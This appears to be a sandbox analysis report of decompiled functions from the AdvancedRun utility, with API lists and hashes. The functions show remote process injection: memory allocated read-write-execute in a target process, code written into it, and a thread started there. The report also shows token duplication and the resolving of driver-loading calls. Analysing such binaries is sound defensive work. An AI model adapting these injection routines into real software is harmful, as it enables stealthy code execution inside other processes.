                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$FileModuleName
                                                                  • String ID:
                                                                  • API String ID: 3859505661-0
                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			// Tears down the psapi helper context: frees the module handle and the two dynamic
                                                                  			// arrays stored at offsets 6 and 0xa of the structure.
                                                                  			E004095DA(signed int* __edi) {
                                                                  				void* __esi;
                                                                  				struct HINSTANCE__* _t3;
                                                                  				signed int* _t7;
                                                                  
                                                                  				_t7 = __edi;
                                                                  				_t3 =  *__edi;
                                                                  				if(_t3 != 0) {
                                                                  					FreeLibrary(_t3); // executed
                                                                  					 *__edi =  *__edi & 0x00000000;
                                                                  				}
                                                                  				E004099D4( &(_t7[0xa]));
                                                                  				return E004099D4( &(_t7[6]));
                                                                  			}

                                                                  APIs
                                                                  • FreeLibrary.KERNELBASE(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: FreeLibrary
                                                                  • String ID:
                                                                  • API String ID: 3664257935-0
                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			// Enumerates the resources of type _a8 in module _a4, invoking callback E0040A33B for each name.
                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                  
                                                                  				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
                                                                  				return 1;
                                                                  			}

                                                                  APIs
                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: EnumNamesResource
                                                                  • String ID:
                                                                  • API String ID: 3334572018-0
                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

Non-executed Functions

C-Code - Quality: 100%
E00408E31() {
    void* _t1;
    struct HINSTANCE__* _t2;
    _Unknown_base(*)()* _t14;

    // Resolves a set of ntdll.dll exports on first use and caches the function
    // pointers in globals (0x41c47c .. 0x41c4a8). 0x41c4ac holds the ntdll module
    // handle and doubles as the "already resolved" flag.
    if( *0x41c4ac == 0) {
        _t2 = GetModuleHandleW(L"ntdll.dll");
        *0x41c4ac = _t2;
        *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
        *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
        *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
        *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
        *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
        *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
        *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
        *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
        *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
        *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
        *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
        _t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
        *0x41c4a8 = _t14;
        return _t14;
    }
    // _t1 is never assigned on this path: the decompiler is showing an
    // undefined/unused return value, not a meaningful result.
    return _t1;
}

Instruction addresses: 0x00408e38, 0x00408e44, 0x00408e56, 0x00408e68, 0x00408e7a, 0x00408e8c, 0x00408e9e, 0x00408eb0, 0x00408ec2, 0x00408ed4, 0x00408ee6, 0x00408ef8, 0x00408f0a, 0x00408f1c, 0x00408f21, 0x00408f23, 0x00000000, 0x00408f28, 0x00408f29

APIs
• GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
• GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
• GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
• GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
• GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
• GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
• GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
• GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
• GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
• GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
• GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
• GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
• GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
Strings
Memory Dump Source
• Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
• API String ID: 667068680-4280973841
• Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
• Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
• Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
• Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 70%
E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
    char _v8;
    long _v12;
    long _v16;
    long _v20;
    intOrPtr _v24;
    long _v28;
    char _v564;
    char _v16950;
    char _v33336;
    _Unknown_base(*)()* _v33348;
    _Unknown_base(*)()* _v33352;
    void _v33420;
    void _v33432;
    void _v33436;
    intOrPtr _v66756;
    intOrPtr _v66760;
    void _v66848;
    void _v66852;
    void* __edi;
    void* _t76;
    _Unknown_base(*)()* _t84;
    _Unknown_base(*)()* _t87;
    void* _t90;
    signed int _t126;
    struct HINSTANCE__* _t128;
    intOrPtr* _t138;
    void* _t140;
    void* _t144;
    void* _t147;
    void* _t148;

    E0040B550(0x10524, __ecx);
    _t138 = _a4;
    _v12 = 0;
    *_t138 = 0;
    // 0x1f0fff = PROCESS_ALL_ACCESS; _a8 is the id of the target process.
    _t76 = OpenProcess(0x1f0fff, 0, _a8);
    _a8 = _t76;
    if(_t76 == 0) {
        *_t138 = GetLastError();
        L30:
        return _v12;
    }
    // Zero a 0x8288-byte parameter block that is later written into the target process.
    _v33436 = 0;
    memset( &_v33432, 0, 0x8284);
    _t148 = _t147 + 0xc;
    _t128 = GetModuleHandleW(L"kernel32.dll");
    _v8 = 0;
    // E00409C70 fills _v8 with a GetProcAddress-compatible resolver (its subcalls
    // fetch GetProcAddress / LdrGetProcedureAddress); if it leaves _v8 NULL the
    // imported GetProcAddress is called with the two pushed arguments instead.
    E00409C70( &_v8);
    _push("CreateProcessW");
    _push(_t128);
    if(_v8 == 0) {
        _t84 = GetProcAddress();
    } else {
        _t84 = _v8();
    }
    _v33352 = _t84;   // CreateProcessW pointer, stored in the parameter block
    E00409C70( &_v8);
    _push("GetLastError");
    _push(_t128);
    if(_v8 == 0) {
        _t87 = GetProcAddress();
    } else {
        _t87 = _v8();
    }
    _t140 = _a28;
    _v33348 = _t87;   // GetLastError pointer, stored in the parameter block
    if(_t140 != 0) {
        // 0x11 dwords = 0x44 bytes: a caller-supplied STARTUPINFOW is copied in.
        _t126 = 0x11;
        memcpy( &_v33420, _t140, _t126 << 2);
        _t148 = _t148 + 0xc;
    }
    _v33420 = 0x44;   // STARTUPINFOW.cb
    // E00404923 behaves like a bounded string copy (max length, destination, source);
    // an absent argument leaves a one-byte placeholder in the block.
    if(_a16 == 0) {
        _v33336 = 1;
    } else {
        E00404923(0x2000,  &_v33336, _a16);
    }
    if(_a12 == 0) {
        _v16950 = 1;
    } else {
        E00404923(0x2000,  &_v16950, _a12);
    }
    if(_a24 == 0) {
        _v564 = 1;
    } else {
        E00404923(0x104,  &_v564, _a24);
    }
    _v24 = _a20;
    _v28 = 0;
    // Two allocations in the target (0x1000 = MEM_COMMIT): 0x8288 bytes
    // PAGE_READWRITE (4) for the parameter block and 0x800 bytes
    // PAGE_EXECUTE_READWRITE (0x40) for a code stub.
    _a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
    _t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
    _a12 = _t90;
    if(_a16 == 0 || _t90 == 0) {
        *_a4 = GetLastError();
    } else {
        // The stub is copied from this image starting at E0040A3DC.
        WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
        WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
        _v20 = 0;
        _v16 = 0;
        _a24 = 0;
        // E0040A272 yields a thread handle in the target process (resumed below),
        // i.e. the stub runs there with the parameter block as its argument.
        _t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
        _a28 = _t144;
        if(_t144 == 0) {
            *_a4 = GetLastError();
        } else {
            ResumeThread(_t144);
            WaitForSingleObject(_t144, 0x7d0);   // 0x7d0 = 2000 ms timeout
            CloseHandle(_t144);
        }
        // Read the block back to collect the result, then release both regions (0x8000 = MEM_RELEASE).
        _v66852 = 0;
        memset( &_v66848, 0, 0x8284);
        ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
        VirtualFreeEx(_a8, _a16, 0, 0x8000);
        VirtualFreeEx(_a8, _a12, 0, 0x8000);
        if(_a28 != 0) {
            *_a4 = _v66756;     // error code reported by the stub
            _v12 = _v66760;     // return value of this function
            if(_a32 != 0) {
                // Four movsd: 16 bytes copied out to the caller (the size of a PROCESS_INFORMATION).
                asm("movsd");
                asm("movsd");
                asm("movsd");
                asm("movsd");
            }
        }
        if(_v20 != 0) {
            FreeLibrary(_v20);
        }
    }
    goto L30;
}

Instruction addresses: 0x0040a474, 0x0040a47b, 0x0040a48a, 0x0040a48d, 0x0040a48f, 0x0040a497, 0x0040a49a, 0x0040a6f7, 0x0040a6f9, 0x0040a700, 0x0040a700, 0x0040a4ad, 0x0040a4b3, 0x0040a4b8, 0x0040a4c6, 0x0040a4cc, 0x0040a4cf, 0x0040a4dd, 0x0040a4e2, 0x0040a4e3, 0x0040a4ea, 0x0040a4e5, 0x0040a4e5, 0x0040a4e5, 0x0040a4ec, 0x0040a4f6, 0x0040a4fe, 0x0040a503, 0x0040a504, 0x0040a50b, 0x0040a506, 0x0040a506, 0x0040a506, 0x0040a50d, 0x0040a512, 0x0040a518, 0x0040a51c, 0x0040a523, 0x0040a523, 0x0040a523, 0x0040a528, 0x0040a537, 0x0040a54c, 0x0040a539, 0x0040a544, 0x0040a549, 0x0040a558, 0x0040a56d, 0x0040a55a, 0x0040a565, 0x0040a56a, 0x0040a579, 0x0040a591, 0x0040a57b, 0x0040a589, 0x0040a58e, 0x0040a5b4, 0x0040a5b7, 0x0040a5cc, 0x0040a5cf, 0x0040a5d4, 0x0040a5d7, 0x0040a6ed, 0x0040a5e5, 0x0040a5fa, 0x0040a60b, 0x0040a61a, 0x0040a620, 0x0040a623, 0x0040a62b, 0x0040a62f, 0x0040a632, 0x0040a659, 0x0040a634, 0x0040a635, 0x0040a641, 0x0040a648, 0x0040a648, 0x0040a668, 0x0040a66e, 0x0040a685, 0x0040a69e, 0x0040a6a8, 0x0040a6ad, 0x0040a6bd, 0x0040a6c5, 0x0040a6c8, 0x0040a6d0, 0x0040a6d1, 0x0040a6d2, 0x0040a6d3, 0x0040a6d3, 0x0040a6c8, 0x0040a6d7, 0x0040a6dc, 0x0040a6dc, 0x0040a6d7, 0x00000000

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,00000000,?,00402225,?,00000000,?,?,?,?,?,?), ref: 0040A48F
                                                                  • memset.MSVCRT ref: 0040A4B3
                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00000000), ref: 0040A4C0
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                    • Part of subcall function 00409C70: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                    • Part of subcall function 00409C70: GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CE4
                                                                    • Part of subcall function 00409C70: strlen.MSVCRT ref: 00409CF1
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 0040A4EA
                                                                  • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040A50B
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00008288,00001000,00000004), ref: 0040A5BA
                                                                  • VirtualAllocEx.KERNEL32(?,00000000,00000800,00001000,00000040), ref: 0040A5CF
                                                                  • WriteProcessMemory.KERNEL32(?,00000000,0040A3DC,00000800,00000000), ref: 0040A5FA
                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A60B
                                                                  • ResumeThread.KERNEL32(00000000,?,?,?,?), ref: 0040A635
                                                                  • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                  • memset.MSVCRT ref: 0040A66E
                                                                  • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                  • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                  • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                  • GetLastError.KERNEL32 ref: 0040A6E4
                                                                  • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                  • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                  • API String ID: 1572607441-20550370
                                                                  • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                  • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                  • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0040289F(intOrPtr* __esi) {
                                                                  				void* _t9;
                                                                  				struct HINSTANCE__* _t10;
                                                                  				_Unknown_base(*)()* _t14;
                                                                  
                                                                  				if( *(__esi + 0x10) == 0) {
                                                                  					_t10 = LoadLibraryW(L"advapi32.dll");
                                                                  					 *(__esi + 0x10) = _t10;
                                                                  					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
                                                                  					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
                                                                  					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
                                                                  					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
                                                                  					 *(__esi + 8) = _t14;
                                                                  					return _t14;
                                                                  				}
                                                                  				return _t9;
                                                                  			}

                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                  • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                  • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                  • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                  • API String ID: 2238633743-1970996977
                                                                  • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                  • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                  • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 64%
                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
                                                                  				void* _v8;
                                                                  				char _v12;
                                                                  				char* _v20;
                                                                  				long _v24;
                                                                  				intOrPtr _v28;
                                                                  				char* _v36;
                                                                  				signed int _v40;
                                                                  				void _v44;
                                                                  				char _v48;
                                                                  				char _v52;
                                                                  				struct _OSVERSIONINFOW _v328;
                                                                  				void* __esi;
                                                                  				signed int _t40;
                                                                  				intOrPtr* _t44;
                                                                  				void* _t49;
                                                                  				struct HINSTANCE__** _t54;
                                                                  				signed int _t55;
                                                                  
                                                                  				_t54 = __eax;
                                                                  				_v328.dwOSVersionInfoSize = 0x114;
                                                                  				GetVersionExW( &_v328);
                                                                  				if(_v328.dwMajorVersion < 6) {
                                                                  					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
                                                                  				}
                                                                  				E0040A1EF(_t54);
                                                                  				_t44 =  *((intOrPtr*)(_t54 + 4));
                                                                  				if(_t44 != 0) {
                                                                  					_t55 = 8;
                                                                  					memset( &_v44, 0, _t55 << 2);
                                                                  					_v12 = 0;
                                                                  					asm("stosd");
                                                                  					_v36 =  &_v12;
                                                                  					_v20 =  &_v52;
                                                                  					_v48 = 0x24;
                                                                  					_v44 = 0x10003;
                                                                  					_v40 = _t55;
                                                                  					_v28 = 0x10004;
                                                                  					_v24 = 4;
                                                                  					_a16 = 0;
                                                                  					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
                                                                  					asm("sbb eax, eax");
                                                                  					return  !( ~_t40) & _a16;
                                                                  				}
                                                                  				return 0;
                                                                  			}

                                                                  APIs
                                                                  • GetVersionExW.KERNEL32(?,76D268A0,00000000), ref: 0040A290
                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                  • String ID: $
                                                                  • API String ID: 283512611-3993045852
                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 85%
                                                                  			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                                  				struct tagPOINT _v12;
                                                                  				void* __esi;
                                                                  				void* _t47;
                                                                  				struct HBRUSH__* _t56;
                                                                  				void* _t61;
                                                                  				unsigned int _t63;
                                                                  				void* _t68;
                                                                  				struct HWND__* _t69;
                                                                  				struct HWND__* _t70;
                                                                  				void* _t73;
                                                                  				unsigned int _t74;
                                                                  				struct HWND__* _t76;
                                                                  				struct HWND__* _t77;
                                                                  				struct HWND__* _t78;
                                                                  				struct HWND__* _t79;
                                                                  				unsigned int _t85;
                                                                  				struct HWND__* _t87;
                                                                  				struct HWND__* _t89;
                                                                  				struct HWND__* _t90;
                                                                  				struct tagPOINT _t96;
                                                                  				struct tagPOINT _t98;
                                                                  				signed short _t103;
                                                                  				void* _t106;
                                                                  				void* _t117;
                                                                  
                                                                  				_t106 = __edx;
                                                                  				_push(__ecx);
                                                                  				_push(__ecx);
                                                                  				_t47 = _a4 - 0x110;
                                                                  				_t117 = __ecx;
                                                                  				if(_t47 == 0) {
                                                                  					__eflags =  *0x40feb0;
                                                                  					if(__eflags != 0) {
                                                                  						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
                                                                  					} else {
                                                                  						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
                                                                  						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
                                                                  					}
                                                                  					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
                                                                  					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
                                                                  					E0040103E(_t117, __eflags);
                                                                  					E00404DA9(_t106,  *(_t117 + 0x10), 4);
                                                                  					goto L30;
                                                                  				} else {
                                                                  					_t61 = _t47 - 1;
                                                                  					if(_t61 == 0) {
                                                                  						_t103 = _a8;
                                                                  						_t63 = _t103 >> 0x10;
                                                                  						__eflags = _t103 - 1;
                                                                  						if(_t103 == 1) {
                                                                  							L24:
                                                                  							__eflags = _t63;
                                                                  							if(_t63 != 0) {
                                                                  								goto L30;
                                                                  							} else {
                                                                  								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
                                                                  								DeleteObject( *(_t117 + 0x43c));
                                                                  								goto L8;
                                                                  							}
                                                                  						} else {
                                                                  							__eflags = _t103 - 2;
                                                                  							if(_t103 != 2) {
                                                                  								goto L30;
                                                                  							} else {
                                                                  								goto L24;
                                                                  							}
                                                                  						}
                                                                  					} else {
                                                                  						_t68 = _t61 - 0x27;
                                                                  						if(_t68 == 0) {
                                                                  							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                  							__eflags = _a12 - _t69;
                                                                  							if(_a12 != _t69) {
                                                                  								__eflags =  *0x40ff30;
                                                                  								if( *0x40ff30 == 0) {
                                                                  									goto L30;
                                                                  								} else {
                                                                  									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                  									__eflags = _a12 - _t70;
                                                                  									if(_a12 != _t70) {
                                                                  										goto L30;
                                                                  									} else {
                                                                  										goto L18;
                                                                  									}
                                                                  								}
                                                                  							} else {
                                                                  								L18:
                                                                  								SetBkMode(_a8, 1);
                                                                  								SetTextColor(_a8, 0xc00000);
                                                                  								_t56 = GetSysColorBrush(0xf);
                                                                  							}
                                                                  						} else {
                                                                  							_t73 = _t68 - 0xc8;
                                                                  							if(_t73 == 0) {
                                                                  								_t74 = _a12;
                                                                  								_t96 = _t74 & 0x0000ffff;
                                                                  								_v12.x = _t96;
                                                                  								_v12.y = _t74 >> 0x10;
                                                                  								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
                                                                  								_push(_v12.y);
                                                                  								_a8 = _t76;
                                                                  								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
                                                                  								__eflags = _t77 - _a8;
                                                                  								if(_t77 != _a8) {
                                                                  									__eflags =  *0x40ff30;
                                                                  									if( *0x40ff30 == 0) {
                                                                  										goto L30;
                                                                  									} else {
                                                                  										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
                                                                  										_push(_v12.y);
                                                                  										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
                                                                  										__eflags = _t79 - _t78;
                                                                  										if(_t79 != _t78) {
                                                                  											goto L30;
                                                                  										} else {
                                                                  											goto L13;
                                                                  										}
